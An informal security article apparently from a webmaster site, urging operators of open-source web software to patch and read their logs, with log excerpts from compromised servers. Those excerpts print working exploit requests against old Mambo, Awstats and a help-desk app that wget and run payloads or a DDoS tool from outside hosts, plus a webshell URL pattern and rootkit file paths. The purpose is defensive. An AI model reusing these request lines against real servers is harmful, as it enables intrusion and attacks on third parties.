OpenSource is free but highly vulnerable

Important: The purpose of this article is not to oppose the use of opensource, But to express the importance of professionalism and system administration on servers using opensource softwares.

So you are using OpenSource software but are you sure you are only running the software Which you installed ? Are you sure you are not running any spyware/Addware which got embedded in your opensource software due to some security exploit ?

Remember The hacking is NOT when you see a message on your website saying "Your site is defaced" or "You are hacked". This kind of hacker actually helped you due to his stupidity. And you get a chance to patch the security holes. Such kind of kiddy hackers dont know what they can do or infact what they are doing, They just get the sample code from some security related website and execute it to add funny sentences like above to your website to impress their girl friends.

The real problem is when you dont know what is going on behind the scenes. Probably you are running some hidden application and you dont know about that for years. As a shared hosting account owner it is only 10% your responsibilty but 90% the responsibility of your server manager or hosting provider who never spend enough time to check server logs to see any ATTEMPTS made to server or any of the website hosted on their server.

But why opensource is so dangerous ? Good question! It is just like that if bad guys have the internal map of your home, They know where your safe is located and how your security alarms will get activated. So they can just dig the correct wall to access it. Opensource have full code available to everyone. Everyone also includes bad guys and good guys. These bad and good guys are mostly programmers, they find out the weakness of software, Bad guys exploit it and mostly to get attention of people they release it on public forums or IRC channels. Good guys post it to the developers of softwares. The developers fix the security holes and releae the next version or just a patch. When a new version or a patch is released, It also include a document titled CHANGELOG. This changelog document usually have the details of security holes in previous version which are fixed and it is suggested to upgrade. So in any way the detail of security holes is now available publicly.

Bad guys use scanning scripts and softwares to scan the websites and these scripts detect the installed opensource applications and get their Version Numbers. Such BOTs or Scripts also match the version numbers with the exploitable versions stored in their database, Some even attempt simple tests to make sure that your installed opensource application is not patched or upgraded and store the information for bad Guy. Thats it... You are TAGGED.

Now what Bad Guys will do to my site/server ? hmmm! they usually do any of below (Not limited to)

Inject some code in opensource application files so they send the passwords to attacker. For a detailed practical example please check this example at PHP Security Consortium

They can get the Admin user rights of your opensource application using Session HiJacking. For a detailed practical example please check this example at PHP Security Consortium

They can browse the server directories. For a detailed practical example please check this example at PHP Security Consortium

The most common and most dangerous thing is that they can execute Shell commands. Once they are able to execute shell commands they usually download, compile, and run IRC service in public writeable dirctories mostly in /tmp or /var/tmp. And then this IRC is used to distribute Warez softwares and illegal CDs.

They inject the different kind of java script codes in your php/html pages. Sometimes it is used to display Add popups to your site visitors, Sometimes they redirect visitors to their marketing sites. Or generate clicks for their Google Addwords Adds.

A most common task they do is, Send Spam. They just install some kind of gateway script on your site and use their remote softwares to send spam through your site/server

If the exploited application is not a web application but a service running as root like FTP, SSH etc then BAM. The first thing they will do is they will try to install a backdoor, Yes A tiny application running at a non common port providing root access to remote attacker to execute shell commands on your server as root. 2nd thing they will do is try to install a rootkit but sensible hackers know that most of old rootkits dont work on new operating systems so there is very less chance that they will be able to do that unless you are running a very old operating system.

Another common use of your site/server will be to serve as a proxy to commit credit card frauds. Yes it is impossible for someone to use a credit card from Brazilian or Asian IP if credit card belongs to a USA citizen. So they will try to use a hacked proxy in USA to fool the AVS system of transaction servers.

A less common but effective thing they do is DDOS. They keep the record of servers/sites which they can exploit anytime. And when they need to launch a DDOS (Distributed denial of service) they use your site as one of the DDOS source.

So as a opensource user what can you do ? When was the last time you checked the developers website to find out any updates of the software you are using ? If you have a dedicated server, When was the last time you checked the server logs to see any unusual strings in POST and GET requests ? Or any failed tcp connection attempts at your public ports with protocol errors ? I know most of you didnt because your shared hosting service provider provide you a one click installation of most of opensource softwares but they never provide any automated way to update the software. Because practically for most of opensource web applications there is no way a host can integrate the automated updates in their control panel. It is because every new upgrade can be different from previous one. And as a server admin you might be just using a Panel like Webmin, Plesk, Cpanel etc and never tried to look the server logs or never checked if your server kernel is up2date. Are you using lot of colourfull Addons/Plugins with your opensource software installation ? Do you know the authenticity of the site from where you downloaded that plugin ? Is the writer of that plugin keeping it up2date ? Are you using a dead opensource software/application/script/addon/plugin ? ........THINK AGAIN.

It is not too hard to monitor your opensource packages through logs. Below are some examples taken from compromised production servers. I have changed some information in the data for my own reasons.

An image on the site is replaced with an executeable script. And script is providing the shell access through web. This was identified by below suspecious line in log file
http://xx.xx.xx.xx/cmd.gif?&cmd=xxxx

A bot is attempting random usernames and passwords on ssh port to get a lucky access. This is very common log entries. May 1 14:06:17 xxxxx sshd[23377]: Invalid user admin from xx.xxx.xx.xxx May 1 14:06:19 xxxxx sshd[23381]: Invalid user test from xx.xxx.xx.xxx May 1 14:06:23 xxxxx sshd[23387]: Invalid user webmaster from xx.xxx.xx.xxx May 1 14:06:27 xxxxx sshd[23393]: Invalid user oracle from xx.xxx.xx.xxx May 1 14:06:29 xxxxx sshd[23397]: Invalid user library from xx.xxx.xx.xxx May 1 14:06:31 xxxxx sshd[23399]: Invalid user info from xx.xxx.xx.xxx May 1 14:06:33 xxxxx sshd[23403]: Invalid user shell from xx.xxx.xx.xxx May 1 14:06:35 xxxxx sshd[23406]: Invalid user linux from xx.xxx.xx.xxx May 1 14:06:37 xxxxx sshd[23409]: Invalid user unix from xx.xxx.xx.xxx May 1 14:06:38 xxxxx sshd[23413]: Invalid user webadmin from xx.xxx.xx.xxx May 1 14:06:42 xxxxx sshd[23419]: Invalid user test from xx.xxx.xx.xxx May 1 14:06:46 xxxxx sshd[23425]: Invalid user admin from xx.xxx.xx.xxx May 1 14:06:50 xxxxx sshd[23431]: Invalid user master from xx.xxx.xx.xxx May 1 14:06:58 xxxxx sshd[23443]: Invalid user network from xx.xxx.xx.xxx May 1 14:07:00 xxxxx sshd[23447]: Invalid user word from xx.xxx.xx.xxx

An older version of Mambo is exploited, Log have below record. Copy that and decode it in URL Decoder which you can access in left menu and you will get a clear idea what is going on. xxxx.xx.xx.xx - - [08/Jun/xxxx:04:30:22 +1200] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://xx.xx.xxx.xxx/cmd.gif?&cmd=cd%20/tmp;wget%20xx.xx.xx.xx/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 200 70 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"

Awstats is exploited. Decode in url decoder to get an idea what is going on.
access_log.5:xx.xxx.xxx.xx - - [16/May/xxxx:10:25:54 +1200] "GET /awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3buname%20%2da%3b%20cd%20%2ftmp%20%3bwget%20undernet%2eat%2fh%20%a%3bchmod%20%2bx%20h%20%3b%2e%2fh%3becho%20e_exp%3b%2500

An opensource Help Desk is exploited. Yes decode to see what is going on.
/ticket/include/main.php?config[search_disp]=true&include_dir=http://pharoeste.net/x/out.gif?&cmd=cd%20/tmp;wget%20http://www.gigashell.org/xpl/ddos/f3;chmod%20777%20f3;./f3%20200.189.130.66%20500%205000 HTTP/1.1" 200 7802 "-""Mozilla/5.0 (Windows; U; Win98; pt-BR;rv:1.7.8) Gecko/20050511 Firefox/1.0.4"

Output of "pstree" and "ps -ax" include below line on a server having a zk rootkit installed.

root]# pstree init.zk-+-3

ZK rootkit files installed on a compromized server

root]# locate .zk /etc/sysconfig/console/load.zk /etc/sysconfig/hash.zk /var/www/cgi-bin/sh.zk.cgi /usr/.zk /usr/.zk/zps /usr/.zk/zportscan /usr/.zk/netrate /usr/.zk/zgrabb /usr/.zk/.zklog /usr/.zk/.bash_history.root /usr/.zk/socklist /usr/X11R6/.zk /usr/X11R6/.zk/xfs /usr/X11R6/.zk/echo /usr/share/.zk /usr/share/.zk/zk /usr/share/.zk/.sniffer /sbin/init.zk

This article is exclusivly written for and by Openpages.info. It can be used freely on any other website with the refernce of openpages.info.